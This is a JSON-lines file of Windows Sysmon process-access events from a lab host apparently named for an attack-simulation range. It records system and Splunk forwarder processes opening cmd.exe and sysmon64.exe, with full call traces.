{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3983,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
